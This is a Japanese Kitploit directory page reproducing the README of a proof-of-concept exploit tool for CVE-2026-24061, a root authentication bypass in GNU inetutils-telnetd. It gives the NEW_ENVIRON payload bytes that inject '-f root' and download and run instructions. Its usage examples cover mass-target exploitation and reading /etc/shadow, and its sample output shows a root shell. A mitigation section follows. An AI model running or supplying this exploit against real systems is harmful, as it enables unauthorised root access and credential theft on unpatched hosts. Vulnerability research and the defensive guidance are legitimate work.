Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-24061 — 概念実証: CVE-2026-24061 は、GNU inetutils-telnetd における重大な認証バイパスの脆弱性であり、認証されていないリモート攻撃者が悪意のある NEW_ENVIRON telnet オプションを悪用することで、即座にルートシェルアクセスを取得できるようになります。 | Kitploit
ツール/GitHubGitHub/sh4den/cve-2026-24061
特権昇格脆弱性分析エクスプロイトネットワークセキュリティペネトレーションテストコマンド&コントロール認証論文と研究学習と教育リモートアクセスツール
GitHubsh4den/cve-2026-24061

CVE-2026-24061

61122ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

概念実証: CVE-2026-24061 は、GNU inetutils-telnetd における重大な認証バイパスの脆弱性であり、認証されていないリモート攻撃者が悪意のある NEW_ENVIRON telnet オプションを悪用することで、即座にルートシェルアクセスを取得できるようになります。

リポジトリを見る

CVE-2026-24061

GNU inetutils-telnetd - リモート認証バイパス

CVE-2026-24061 を悪用するためのセキュリティリサーチツールです。これは GNU inetutils-telnetd の重大なリモート認証バイパス脆弱性であり、認証なしで即座に root シェルアクセスを可能にします。


目次

  • 脆弱性の概要
  • 影響を受けるバージョン
  • 技術的分析
  • 前提条件
  • インストール
  • 使用方法
  • 出力リファレンス
  • 悪用手法
  • 緩和策と是正措置
  • 侵害の痕跡(IOC)
  • 法的免責事項
  • 参考文献
  • クレジット

脆弱性の概要

項目値
CVE 識別子CVE-2026-24061
CVSS v3.1 スコア9.8(緊急)
CVSS ベクターCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE 分類CWE-88: コマンドにおける引数デリミタの不適切な無害化
ベンダーGNU Project
製品inetutils-telnetd
公開日2026年1月20日
パッチ提供状況未定

概要

GNU inetutils-telnetd バージョン 2.7 以前に、認証されていないリモート攻撃者が認証を完全にバイパスして即座に root シェルアクセスを取得できる重大な脆弱性が存在します。この脆弱性は、NEW_ENVIRON telnet オプションを介して、特別に細工された値 "-f root" を持つ USER 環境変数を注入することで悪用され、すべての認証メカニズムをバイパスします。

影響評価

  • 機密性: システムデータの完全な侵害
  • 完全性: root 権限によるシステム全体の制御
  • 可用性: システム全体の乗っ取りまたはサービス拒否の可能性
  • スコープ: 変更なし - 悪用は脆弱な telnet サービスのみに影響

影響を受けるバージョン

バージョン範囲ステータス
<= 2.7脆弱
> 2.7パッチ状況未定

技術的分析

脆弱性の根本原因

この脆弱性は、telnetd の NEW_ENVIRON オプションハンドラにおける USER 環境変数の不適切な検証に起因します。NEW_ENVIRON telnet オプションを処理する際、telnetd サービスは USER 変数の値を login プロセスに渡す前にサニタイズしません。攻撃者が USER を "-f root" に設定することで、資格情報を必要とせずに root ユーザーの認証を強制的に成功させるコマンドライン引数を注入します。

攻撃ベクトル

  1. 攻撃者が telnetd サービス(通常ポート 23)に接続する
  2. telnet オプション交渉中に、サーバーが NEW_ENVIRON データを要求する
  3. 攻撃者が USER 環境変数を "-f root" に設定して応答する
  4. 悪意のある引数が認証チェックをバイパスする
  5. パスワードプロンプトなしで即座に root シェルが付与される
  6. システム全体の侵害が達成される

悪用の複雑さ

  • 前提条件: 対象の telnetd サービスへのネットワークアクセス
  • 認証: 不要
  • ユーザー操作: なし
  • 攻撃の複雑さ: 低

前提条件

システム要件

  • Python 3.7 以上
  • 対象の telnetd インスタンスへのネットワーク接続
  • Python スクリプトを実行するための十分な権限

依存関係

すべての依存関係は Python の標準ライブラリに含まれています:

パッケージ用途
socketネットワーク通信
selectI/O 多重化
sysシステム連携
osオペレーティングシステムインターフェース
threading並行ターゲット悪用
datetimeタイムスタンプのフォーマット

インストール

方法 1: Git を使用

# Clone the repository
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061

# Run the exploit
python3 main.py -u <target_ip>

方法 2: 直接ダウンロード

# Download the exploit
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py

# Make it executable (Linux/macOS)
chmod +x main.py

# Run the exploit
python3 main.py -u <target_ip>

方法 3: 手動インストール

# Ensure Python 3.7+ is installed
python3 --version

# Download and run
python3 main.py -u <target_ip>

使用方法

コマンドラインインターフェース

Usage:
    python3 main.py -u <target_ip> [-p <port>] [-usr <user>]
    python3 main.py -l <targets_file> [-p <port>] [-usr <user>]
    echo "commands" | python3 main.py -u <target_ip>

Arguments:
    -u          Single target IP address or hostname
    -l          Path to file containing target IPs (one per line)
    -p          Target port (default: 23)
    -usr        User to exploit as (default: root)

単一ターゲットの悪用

単一の telnetd インスタンスを悪用します:

# Basic exploitation (default port 23, user root)
python3 main.py -u 192.168.1.100

# Custom port
python3 main.py -u 192.168.1.100 -p 2323

# Different user
python3 main.py -u 192.168.1.100 -usr admin

コマンド実行モード

コマンドを非対話的に実行します:

# Single command
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100

# Multiple commands
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100

# Command with output redirection
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100

複数ターゲットの一括悪用

ファイルから複数のターゲットを一括で悪用します:

python3 main.py -l targets.txt
python3 main.py -l targets.txt -p 2323
python3 main.py -l targets.txt -usr admin

ターゲットファイル形式 (targets.txt):

192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com

注記:

  • 1 行に 1 ターゲット
  • IP アドレスまたはホスト名
  • 空行は無視されます
  • ターゲットはスレッディングを使用して並行して悪用されます

出力リファレンス

ステータスインジケーター

インジケーター色説明
[SUCCESS]緑ターゲットへの接続に成功
[EXPLOIT]緑悪用ペイロードの送信に成功
[INFO]青現在の操作に関する情報メッセージ
[ERROR]赤接続失敗、タイムアウト、または悪用エラー
[WARNING]黄警告メッセージ(現在は未使用)

出力例

╔═══════════════════════════════════════════════════════════════╗
║     CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass        ║
║                                                               ║
║  CVSS Score: 9.8 (Critical)                                   ║
║  Impact: Remote Authentication Bypass - Instant Root Shell    ║
║                                                               ║
║          This tool is part of the HGrab Framework.            ║
╚═══════════════════════════════════════════════════════════════╝

[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root

悪用手法

Telnet プロトコル交渉プロセス

このエクスプロイトは telnet プロトコルの交渉フェーズを活用します:

  1. 初期接続: 対象ポートへの TCP 接続を確立
  2. オプション交渉: サーバーが様々な telnet オプションに対して DO/WILL コマンドを送信
  3. TTYPE 合意: クライアントが端末タイプの送信に同意(WILL TTYPE)
  4. TSPEED 合意: クライアントが端末速度の送信に同意(WILL TSPEED)
  5. NEW_ENVIRON 合意: クライアントが環境変数の送信に同意(WILL NEW_ENVIRON)
  6. サブネゴシエーション: サーバーが環境変数を要求(SB NEW_ENVIRON SEND)
  7. ペイロード注入: クライアントが NEW_ENVIRON 応答で USER="-f root" を送信
  8. 認証バイパス: サーバーが悪意のある USER 変数を処理
  9. シェルアクセス: 認証なしで root シェルが付与

ペイロード構造

# Telnet IAC (Interpret As Command) = 255
# SB (Subnegotiation Begin) = 250
# SE (Subnegotiation End) = 240
# NEW_ENVIRON option = 39

payload = bytes([
    255,        # IAC
    250,        # SB
    39,         # NEW_ENVIRON
    0,          # IS
    0,          # VAR
]) + b"USER" + bytes([1]) + b"-f root" + bytes([
    255,        # IAC
    240         # SE
])

対話型セッション処理

  • 入力多重化: ソケットと標準入力の同時監視に select.select() を使用します
  • 非ブロッキング I/O: ソケットは非ブロッキング操作用に構成されます
  • Telnet 処理: 表示をクリーンにするため、出力から IAC シーケンスを除去します
  • タイムアウト管理: コマンド実行のタイムアウトは 30 秒です

緩和策と是正措置

即時対応

  1. telnetd の無効化: telnetd サービスを直ちに停止して無効化します

    # systemd-based systems
    sudo systemctl stop telnetd
    sudo systemctl disable telnetd
    
    # xinetd-based systems
    sudo service xinetd stop
    sudo chkconfig telnet off
    
  2. ファイアウォールルール: ファイアウォールレベルで telnet ポート(23)をブロックします

    # iptables
    sudo iptables -A INPUT -p tcp --dport 23 -j DROP
    
    # firewalld
    sudo firewall-cmd --permanent --remove-service=telnet
    sudo firewall-cmd --reload
    
  3. ネットワーク分離: インターネットに公開されたシステムから telnet サービスを削除します

    • 内部ネットワークセグメントのみで使用
    • ネットワークアクセス制御リスト(ACL)を実装

長期的な推奨事項

対策優先度説明
SSH への移行緊急リモートアクセス用に telnet を SSH に置き換える
パッチ管理緊急セキュリティ更新を監視して適用する
サービス監査高不要なネットワークサービスを特定して無効化する
ネットワークセグメンテーション高重要なシステムを公開ネットワークから分離する
侵入検知中悪用の試行を検出するために IDS/IPS を導入する
アクセス制御中リモートサービスに IP ホワイトリストを実装する

代替ソリューション

telnet の代わりに SSH を使用:

# Install OpenSSH server
sudo apt-get install openssh-server  # Debian/Ubuntu
sudo yum install openssh-server      # RHEL/CentOS

# Enable and start SSH
sudo systemctl enable sshd
sudo systemctl start sshd

緩和後の検証

# Verify telnetd is not running
sudo netstat -tlnp | grep :23
sudo ss -tlnp | grep :23

# Should return no results if properly disabled

侵害の痕跡(IOC)

ログ分析

システムログで以下のパターンを確認してください:

認証ログ:

ツールをダウンロード